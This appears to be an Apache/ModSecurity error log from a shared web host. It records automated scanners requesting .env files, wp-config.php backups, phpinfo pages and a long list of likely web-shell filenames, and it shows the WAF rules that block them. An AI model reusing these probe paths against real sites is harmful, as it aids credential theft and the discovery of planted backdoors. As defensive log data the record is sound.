[Mon May 11 16:54:54.131763 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0QAAAMw"]
[Mon May 11 16:54:54.131998 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0QAAAMw"]
[Mon May 11 16:54:54.132259 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/development/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0QAAAMw"]
[Mon May 11 16:54:54.274458 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0gAAAMw"]
[Mon May 11 16:54:54.274688 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0gAAAMw"]
[Mon May 11 16:54:54.274935 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/production/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0gAAAMw"]
[Mon May 11 16:54:54.435677 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0wAAAMw"]
[Mon May 11 16:54:54.436048 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0wAAAMw"]
[Mon May 11 16:54:54.436311 2026] [security2:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/config/app/.env"] [unique_id "agHtvlV4kyjgo4bQBUhe0wAAAMw"]
[Mon May 11 16:54:54.599419 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/phpinfo.php
[Mon May 11 16:54:54.783054 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/info.php
[Mon May 11 16:54:54.926737 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/php.php
[Mon May 11 16:54:55.184778 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/i.php
[Mon May 11 16:54:55.432194 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/pi.php
[Mon May 11 16:54:55.700900 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/pinfo.php
[Mon May 11 16:54:56.023788 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/test.php
[Mon May 11 16:54:56.489055 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/p.php
[Mon May 11 16:54:56.638191 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/debug.php
[Mon May 11 16:54:57.172140 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/test/phpinfo.php
[Mon May 11 16:54:58.638050 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/php-info.php
[Mon May 11 16:54:58.799586 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/phpversion.php
[Mon May 11 16:54:58.995145 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/_phpinfo.php
[Mon May 11 16:54:59.219051 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/old_phpinfo.php
[Mon May 11 16:54:59.496743 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/server-info.php
[Mon May 11 16:54:59.721974 2026] [:error] [pid 1416109:tid 1416142] [client 13.203.95.122:34390] File does not exist: /home/nearoofr/public_html/server-status.php
[Mon May 11 16:55:09.572428 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/0x.php
[Mon May 11 16:55:09.754906 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/xenon1337.php
[Mon May 11 16:55:09.942823 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/mac.php
[Mon May 11 16:55:10.125647 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/hayuk.php
[Mon May 11 16:55:10.322201 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/0d.php
[Mon May 11 16:55:10.534353 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wefile.php
[Mon May 11 16:55:10.718032 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/casp3.php
[Mon May 11 16:55:10.900858 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/birlingsless.php
[Mon May 11 16:55:11.083590 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/unvouc.php
[Mon May 11 16:55:11.267068 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-signin.php
[Mon May 11 16:55:11.829831 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-links.php
[Mon May 11 16:55:12.383459 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/half.php
[Mon May 11 16:55:12.576136 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/2P.php
[Mon May 11 16:55:12.761254 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/tires.php
[Mon May 11 16:55:12.944061 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/aevly.php
[Mon May 11 16:55:13.321491 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-block.php
[Mon May 11 16:55:13.512495 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/like.php
[Mon May 11 16:55:13.694834 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/kj.php
[Mon May 11 16:55:13.881318 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/.well-known/about.php
[Mon May 11 16:55:14.247056 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wpxml.php
[Mon May 11 16:55:14.429637 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/bob.php
[Mon May 11 16:55:14.613285 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/spawns.php
[Mon May 11 16:55:14.806643 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/t3s.php
[Mon May 11 16:55:15.740027 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/uwu.php
[Mon May 11 16:55:15.922691 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/uwa.php
[Mon May 11 16:55:16.108988 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/crgio.php
[Mon May 11 16:55:16.291765 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/geforce.php
[Mon May 11 16:55:16.474476 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-load.php
[Mon May 11 16:55:16.659652 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/3PJcpMFsD8B.php
[Mon May 11 16:55:16.853185 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/.sghb.php
[Mon May 11 16:55:17.035747 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/zoko.php
[Mon May 11 16:55:17.218435 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/bgymj.php
[Mon May 11 16:55:17.401723 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/pucci.php
[Mon May 11 16:55:18.329959 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/one.php
[Mon May 11 16:55:18.512866 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/sl.php
[Mon May 11 16:55:18.700795 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-temp.php
[Mon May 11 16:55:19.070070 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/xmu.php
[Mon May 11 16:55:19.252978 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/mode.php
[Mon May 11 16:55:19.619644 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 16:55:19.803661 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/puc.php
[Mon May 11 16:55:19.986400 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/themes.php
[Mon May 11 16:55:20.173100 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 16:55:20.356185 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/awa.php
[Mon May 11 16:55:20.552040 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/11.php
[Mon May 11 16:55:20.738844 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/p.php
[Mon May 11 16:55:21.104505 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/bthil.php
[Mon May 11 16:55:21.287321 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/shell.php
[Mon May 11 16:55:21.469905 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/seo.php
[Mon May 11 16:55:21.652656 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/7.php
[Mon May 11 16:55:21.851737 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/8.php
[Mon May 11 16:55:22.034437 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/1.php
[Mon May 11 16:55:22.217651 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/class.php
[Mon May 11 16:55:22.400400 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/100.php
[Mon May 11 16:55:22.583781 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/2026w.php
[Mon May 11 16:55:22.791302 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/about.php
[Mon May 11 16:55:22.973823 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/xa.php
[Mon May 11 16:55:23.156300 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 16:55:23.339024 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/w2025.php
[Mon May 11 16:55:23.522788 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/fvvff.php
[Mon May 11 16:55:23.705975 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/edit.php
[Mon May 11 16:55:23.905335 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 16:55:24.271682 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/f6.php
[Mon May 11 16:55:24.454304 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/inputs.php
[Mon May 11 16:55:24.636805 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 16:55:25.027501 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-act.php
[Mon May 11 16:55:25.217987 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/classwithtostring.php
[Mon May 11 16:55:25.600811 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp-blog.php
[Mon May 11 16:55:26.171457 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/adminfuns.php
[Mon May 11 16:55:26.357008 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 16:55:26.539729 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/ms-edit.php
[Mon May 11 16:55:26.723194 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/222.php
[Mon May 11 16:55:27.275252 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/BDKR28WP.php
[Mon May 11 16:55:27.822841 2026] [:error] [pid 1411099:tid 1411122] [client 52.138.31.126:64388] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 16:55:28.545673 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 16:55:28.751684 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 16:55:28.959930 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 16:55:29.579013 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/f35.php
[Mon May 11 16:55:29.996576 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/bal.php
[Mon May 11 16:55:30.611946 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 16:55:31.249952 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 16:55:31.457646 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/buy.php
[Mon May 11 16:55:31.663294 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/xxx.php
[Mon May 11 16:55:31.869093 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/hypo.php
[Mon May 11 16:55:32.285077 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/chosen.php
[Mon May 11 16:55:32.704742 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/00.php
[Mon May 11 16:55:32.910675 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/als.php
[Mon May 11 16:55:33.123876 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/pol.php
[Mon May 11 16:55:33.332583 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/ms-amdin.php
[Mon May 11 16:55:33.539978 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/mini-type0.php
[Mon May 11 16:55:33.745476 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/bypasbnget.php
[Mon May 11 16:55:33.952437 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/sf.php
[Mon May 11 16:55:34.163292 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/file5.php
[Mon May 11 16:55:34.372037 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/fs.php
[Mon May 11 16:55:34.577721 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/4PJcpMFsD8B.php
[Mon May 11 16:55:34.783198 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 16:55:34.988390 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/class.1.php
[Mon May 11 16:55:35.200923 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/wp-gr.php
[Mon May 11 16:55:35.406041 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/cfile.php
[Mon May 11 16:55:35.610939 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/class-wp.php
[Mon May 11 16:55:35.816750 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/ff2.php
[Mon May 11 16:55:36.022058 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/aa2.php
[Mon May 11 16:55:36.232763 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/133.php
[Mon May 11 16:55:36.438020 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/ccou.php
[Mon May 11 16:55:36.643325 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/login8.php
[Mon May 11 16:55:36.849379 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/3586 b64.php
[Mon May 11 16:55:37.054493 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/18299.php
[Mon May 11 16:55:37.263417 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/nx1.php
[Mon May 11 16:55:37.472751 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/Noname6.php
[Mon May 11 16:55:37.679964 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/tia.php
[Mon May 11 16:55:37.899789 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/coa.php
[Mon May 11 16:55:38.105033 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/dr.php
[Mon May 11 16:55:38.313095 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/let.php
[Mon May 11 16:55:38.519767 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/w12.php
[Mon May 11 16:55:38.729322 2026] [:error] [pid 1412074:tid 1412080] [client 52.138.31.126:17251] File does not exist: /home/manhatta/public_html/chati.php
[Mon May 11 16:55:39.073303 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/wp-config.php.backup"] [unique_id "agHt6zJnyuKVXoStDha-nwAAAFc"]
[Mon May 11 16:55:39.073457 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/wp-config.php.backup"] [unique_id "agHt6zJnyuKVXoStDha-nwAAAFc"]
[Mon May 11 16:55:39.836351 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHt6zJnyuKVXoStDha-nwAAAFc"]
[Mon May 11 16:55:41.369853 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/wp-config.php.backup"] [unique_id "agHt7UWKUxpmnkK7zHyH9gAAARY"]
